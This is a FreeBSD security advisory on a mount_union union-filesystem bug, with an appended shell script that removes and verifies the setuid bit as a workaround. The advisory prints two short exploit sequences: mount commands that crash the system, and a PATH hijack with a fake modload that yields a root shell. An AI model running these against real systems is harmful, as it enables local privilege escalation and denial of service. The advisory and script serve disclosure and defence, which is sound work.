COMMAND
mount_union
SYSTEMS AFFECTED
FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current
PROBLEM
A bug was found in the union file system code which can allow
an unprivileged local user to compromise system stability.
This problem is present in all source code and binary
distributions of FreeBSD version 2.x released before 1996-05-18.
The union filesystem code mishandled certain mount orderings.
By executing a certain sequence of mount_union commands,
an unprivileged local user may cause a system reload.
The problem could allow local users to compromise system
stability.
This vulnerability can only be exploited by users with a valid
account on the local system.
To crash the system (as a normal user), try this:
    mkdir a
    mkdir b
    mount_union ~/a ~/b
    mount_union -b ~/a ~/b
To get euid, try this:
    export PATH=/tmp:$PATH
    echo /bin/sh >/tmp/modload
    chmod +x /tmp/modload
    mount_union /dir1 /dir2
SOLUTION
The FreeBSD project is currently developing a solution to this
problem; however, the proper solution will not be available until
a future FreeBSD release. We do not anticipate releasing patches
for previous versions of FreeBSD due to the extensive nature of
this fix. This security advisory will be updated as new
information is made available.
This vulnerability can quickly and easily be limited by removing
the setuid permission bit from the mount_union program. This
workaround will work for all versions of FreeBSD affected by
this problem.
As root, execute the command:
    % chmod u-s /sbin/mount_union
then verify that the setuid permission of the file has been
removed. The permission string should read "-r-xr-xr-x" as
shown here:
    % ls -l /sbin/mount_union
    -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union
In addition to changing the permissions on the executable files,
if you have the source code installed, we suggest patching the
sources so that mount_union will not be installed with the
setuid bit set.
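The workaround above as a reusable script that clears the setuid bit and
then confirms the result instead of assuming chmod succeeded. This is an
added example, not part of the original advisory; the function names
mode_string and strip_setuid are made up for it.

```shell
#!/bin/sh
# Added example (not from the advisory): apply the chmod u-s workaround
# and verify it. Function names are hypothetical.

# mode_string FILE: print the 10-character permission string from ls -l,
# the same field the advisory expects to read "-r-xr-xr-x".
mode_string() {
    ls -ld "$1" | cut -c1-10
}

# strip_setuid FILE: clear the setuid bit on FILE and confirm it is gone.
# Returns 0 if FILE has no setuid bit afterwards,
#         1 if the bit is still set (chmod failed, e.g. not owner or root),
#         2 if FILE does not exist or is not a regular file.
strip_setuid() {
    f=$1
    if [ ! -f "$f" ]; then
        echo "missing: $f" >&2
        return 2
    fi
    before=$(mode_string "$f")
    if [ -u "$f" ]; then
        chmod u-s "$f" 2>/dev/null || true
    fi
    after=$(mode_string "$f")
    # Re-test the bit itself rather than trusting chmod's exit status.
    if [ -u "$f" ]; then
        echo "STILL SETUID: $f ($after)" >&2
        return 1
    fi
    echo "ok: $f $before -> $after"
    return 0
}

# Process any paths given on the command line, e.g. /sbin/mount_union.
rc=0
for path in "$@"; do
    strip_setuid "$path" || rc=1
done
# Exit status is non-zero if any path could not be fixed.
[ "$rc" -eq 0 ]
```

Run it as root with /sbin/mount_union as the argument; a non-zero exit
status means at least one path is missing or still setuid.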